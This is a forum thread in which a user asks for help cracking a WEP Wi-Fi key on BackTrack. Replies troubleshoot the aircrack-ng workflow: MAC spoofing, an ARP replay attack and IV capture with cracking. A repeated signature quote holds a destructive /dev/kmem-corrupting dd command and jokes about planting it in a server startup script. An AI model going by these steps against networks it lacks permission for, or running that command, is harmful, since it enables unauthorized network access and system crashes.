hello aircrack error Help me helpme
Wmware backtrack 3 beta Live Cd to use
Ralink usb wifi adaptor (rausb0) wep key aircrack error
aircrack-ng -n 64 --bssid 00:30:54:01:b1 dosya-01.cap
Oppenning dosya-01.cap
Got no data packets from target network! -------------------------------------->>>>>>ERROR
ne yapmam lazım bir yardımcı olurmusunuz kardeşler
picture see
İmage;
----->>>>> http: --------> : //img179.imageshack.us/my.php?image=hjjyww3.png
HELPME sory image;
İmage upload error
Quote:
You are only allowed to post URLs to other sites after you have made 15 post or more
http:------------->>>//s32.photobucket.com/player.sw...fs=1&os=1&ap=1 ------------------>>>> video the same way apply to follow xploitz thank I'm error
--------------------------------------------------------------------------------
Last edited by Ergin : Yesterday at 01:48 PM.
__________________________________________________ _____________________________
CODE:WEP KEY START
#airmon-ng stop rausb0
#ifconfig wifi0 down
#macchanger --mac xx:xx:xx:xx:xx wifi0
set decive name : no such decive -------------------->>>error
#macchanger --mac xx:xx:xx:xx:xx: rausb0
Current mac: xx:xx:xx:xx:xx
faked mac: xx:xx:xx:xx:xx:
#airmon-ng start rausb0
...............(monıtor anable mode)
#airodump-ng rausb0
............................(scan channel)
#airodump-ng -c 11 --bssid 00:01:02:03:04:05 -w dump rausb0
......................(save ivs) write: dump
#aireplay-ng --arpreplay -b 00:01:02:03:04:05 -h 00:04:05:06:07:08 rausb0
.....................(attack)
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets.............
..............................(Cracking)
#aircrack-ng -b 00:01:02:03:04:05 dump-01.cap
Oppenning dump-01.cap
Got no data packets from target network!------------------------->>>ERROR
![]()
![]()
![]()
If i am reading your problem correctly it seems to me that what you missing is if you are cracking WEP then you need to use the --ivs syntax in the airodump-ng when executing in the shell.
airodump-ng -w dump --band g --channel 11 rausb0
that will capture all data to a cap file but will not capture the weak IV's needed for cracking.
airodump-ng -w dump --ivs --band g --channel 11 rausb0
the extra --ivs syntax will tell airodump-ng to capture to a *.ivs file for use with aircrack-ng
Also when i run aircrack-ng i use the following arguments
aircrack-ng -f 2 -a 1 -n 128 -b $BSSID dump.ivs
That sets Fudge Factor 2 enabled WEP mode Cracking and sets cipher to 128 (of course that could be 64 to)
I hope that helps if you have any questions let me know.
thank you thank you
arp 1 ack 0 packet 0
thank you
good mornıg
I can't view your video, but if you are only getting 1 ARP request then you need to wait a bit more, sometimes this can take between 1 min - 20 mins .... how long did you wait for? can you post an image of your aireplay-ng command, feel free to block your MAC, just need to see exactly what way you've typed it out & how long its been running for
Don't want to say (type?) what you're saying is wrong, but if i recall correctly if you use --ivs, you cant use the ptw method in aircrack. But have to use korek method, which generally needs more captured packets and also takes longer to crack.
all in all, i don't recommend using the --ivs switch, unless you're strapped for hd space![]()
Aquillar> hey, you guys ever play kmem russian roulette?
Agnostos> I don't believe I have. care to explain the details?
Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
Aquillar> keep executing until system crashes
Aquillar> person that crashes system has to buy beer
Agnostos> lol
Agnostos> I wonder if I can sneak that into a server startup script here.
I don't mean to argue but i know for a fact that using the --ivs switch will work with PTW because i crack WEP by running airodump w/ the --ivs switch and then while it's collecting packets i use aircrack-ng against the .ivs file
"aircrack-ng -f 2 -a 1 -n 128 filename.ivs"
and it runs for a second and then switchs to PTW and runs taht way over and over again until enough have been captured and then cracks. I restarts Evertime 5000 more IVS are captured.
Again not to start an arguement but i guarantee it!
To put an end to this --ivs switch argument with PTW.
The original versions DID NOT allow the --ivs switch.
The PTW versions starting from almost a year ago DO ALLOW the use of the --ivs switch.
So you are both right or wrong whichever way you want to look at it, depending on the version you are using.
Aquillar> hey, you guys ever play kmem russian roulette?
Agnostos> I don't believe I have. care to explain the details?
Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
Aquillar> keep executing until system crashes
Aquillar> person that crashes system has to buy beer
Agnostos> lol
Agnostos> I wonder if I can sneak that into a server startup script here.